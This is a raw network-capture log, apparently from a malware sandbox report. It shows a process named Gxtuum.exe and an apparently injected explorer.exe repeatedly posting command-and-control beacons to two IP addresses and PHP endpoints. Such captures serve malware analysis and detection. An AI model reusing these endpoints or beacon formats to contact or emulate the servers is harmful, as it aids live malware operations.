                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:13.907121897 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:15.240773916 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:14 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                78192.168.2.549919185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:15.078315020 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:15.198101997 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:16.523161888 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:15 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                79192.168.2.549922185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:16.637759924 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:17.981180906 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:17 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                80192.168.2.549923185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:16.750751972 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:16.870537996 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:18.399305105 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:17 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                81192.168.2.549924185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:16.894428015 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:18.256582022 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:17 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                82192.168.2.549929185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:18.626338005 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:18.746229887 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:20.084045887 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:19 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                83192.168.2.549934185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:19.811393976 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:21.136235952 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:20 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                84192.168.2.549935185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:20.065779924 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:21.429039955 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:20 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                85192.168.2.549936185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:20.313132048 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:20.433044910 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:21.905390024 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:20 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                86192.168.2.549941185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:22.140980959 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:22.261300087 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:23.590082884 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:22 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                87192.168.2.549943185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:22.834162951 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:24.205987930 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:23 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                88192.168.2.549944185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:23.157795906 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:24.507220030 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:23 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                89192.168.2.549945185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:23.828351021 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:23.948244095 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:25.290349960 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:24 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                90192.168.2.549951185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:25.516387939 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:25.636353016 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:27.123725891 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:26 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                91192.168.2.549952185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:26.219468117 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:27.336642981 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:26 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                92192.168.2.549953185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:26.666832924 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:38:27.991276979 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:27 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                93192.168.2.549959185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:27.359734058 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:27.479851961 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:29.000904083 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:28 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                94192.168.2.549960185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:29.235184908 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:38:29.355673075 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:38:30.907896042 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:29 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                95192.168.2.549962185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:29.484174967 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:30.819617987 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:30 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                96192.168.2.549967185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:38:29.711277008 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:38:31.038338900 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:38:30 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


